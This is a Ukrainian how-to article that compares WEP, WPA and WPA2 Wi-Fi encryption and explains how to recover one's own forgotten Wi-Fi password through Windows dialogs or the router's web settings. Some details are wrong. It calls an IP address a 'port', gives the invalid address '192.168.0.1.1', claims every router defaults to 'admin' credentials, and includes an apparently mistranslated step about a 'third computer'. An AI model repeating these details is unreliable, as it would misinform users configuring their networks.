Найненадійнішим і менш популярним типом шифрування на сьогоднішній день є WEP. Загалом цей тип шифрування використовувався раніше і зараз застосовується рідко. І річ тут не лише в моральній старості такого типу шифрування. Він справді досить ненадійний. Користувачі, що використовують пристрої з WEP-шифруванням, мають досить високі шанси на те, що їх власний ключ безпеки мережі буде зламаний стороннім користувачем. Цей вид шифрування не підтримується багатьма сучасними Wi-Fi роутерами.

Останні два типи шифрування набагато надійніші і набагато частіше використовуються. При цьому користувачі мають можливість вибрати рівень безпеки мережі. Так, WPA та WPA2 підтримують два види перевірки безпеки.

Один з них розрахований на звичайних користувачів і містить один унікальний пароль для всіх пристроїв, що підключаються.

Інший використовується для підприємств та значно підвищує рівень надійності мережі Wi-Fi. Суть його полягає в тому, що для кожного окремого пристрою створюється унікальний ключ безпеки.

Таким чином стає практично неможливо без дозволу підключитися до чужої мережі.

Проте, вибираючи свій майбутній маршрутизатор, слід зупинити свій вибір саме на тій моделі, яка підтримує саме WPA2-шифрування. Пояснюється її більшою надійністю проти WPA. Хоча, звичайно, WPA-шифрування є досить якісним. Більшість маршрутизаторів підтримують обидва ці види шифрування.

Як дізнатися свій ключ безпеки мережі Wi-Fi

Щоб дізнатися свій ключ безпеки від бездротової мережі, можна скористатися кількома способами.

Якщо ви забули пароль від бездротової мережі, до якої підключені на даний момент, то дізнатися його можна легко через свій комп'ютер, не завантажуючи стороннього софту. Ця ситуація часто зустрічається, коли до вас приходять гості та просять скористатися мережею Wi Fi, а ви настільки давно її підключили, що забули всі паролі. Якщо у вас встановлена ​​операційна система Windows, ви отримуєте два додаткові способи дізнатися ключ безпеки мережі через комп'ютер. В інших ситуаціях краще подивитися його у браузері через налаштування роутера. Подивіться на всі варіанти в цій статті та виберіть для себе найбільш зручний.

Як дізнатися ключ безпеки мережі у Windows

Ця операційна система досить гнучка, тому ви легко зможете побачити паролі і ключі, які самі ж вводили. Вам просто потрібно мати доступ до комп'ютера, до якого підключено мережу Wi-Fi.

Як дізнатися ключ безпеки мережі через трей комп'ютера

  • Найшвидший спосіб дізнатися пароль від WiFi. Просто знайдіть у своєму комп'ютері значок мережі в треї. Він знаходиться поряд з датою та часом, може виглядати, як антена чи знак мережі у телефоні.
  • Виберіть мережу, від якої потрібно дізнатися пароль. Ваш комп'ютер повинен бути підключений до неї.
    Клацніть правою кнопкою миші за її назвою.
  • Виберіть “Властивості” у списку.


  • Відкриється вікно, у якому записано пароль. За промовчанням символи пароля захищені параметрами відображення. Поставте галочку біля слів "Відображати знаки, що вводяться", щоб побачити пароль.


Як дізнатися ключ безпеки мережі через центр управління мережами

Якщо ви не можете дізнатись пароль попереднім способом з будь-яких причин. То потрапити у вікно властивостей цієї мережі ви можете в інший спосіб.

  • Відкрийте третій комп'ютер і знову натисніть на значок мереж. Клацніть посилання “Центр управління мережами та спільним доступом”.


  • Тут ви побачите підключену бездротову мережу, вам потрібно перейти за посиланням у середині вікна.


  • У вікні виберіть поле "Властивості бездротової мережі".


  • Тепер перейдіть у вкладку "Безпека".


  • Ви опинилися у вже знайомому вікні з паролем від Wi-Fi підключення. Поставте галочку для відображення символів та дізнайтеся свій ключ від бездротової мережі.


Як дізнатися ключ безпеки мережі через налаштування роутера

Цей варіант підходить всім операційним системам, тому що ви працюєте з роутером безпосередньо.

  • Зайти в налаштування маршрутизатора або роутера можна через браузер. Достатньо ввести в адресний рядок такий порт: 192.168.0.1 або 192.168.0.1.1
  • Пароль та логін у всіх роутерів за замовчуванням "admin" без лапок. Якщо ви змінювали цей параметр, введіть свої логін та пароль.


  • У меню виберіть пункт “Бездротовий режим”.


  • Тепер перейдіть на вкладку “Захист бездротового режиму”.
  • Тут знаходиться пароль від мережі Wi Fi у пункті "Пароль бездротової мережі". Запишіть його та зберігайте у надійному місці, щоб більше не забути.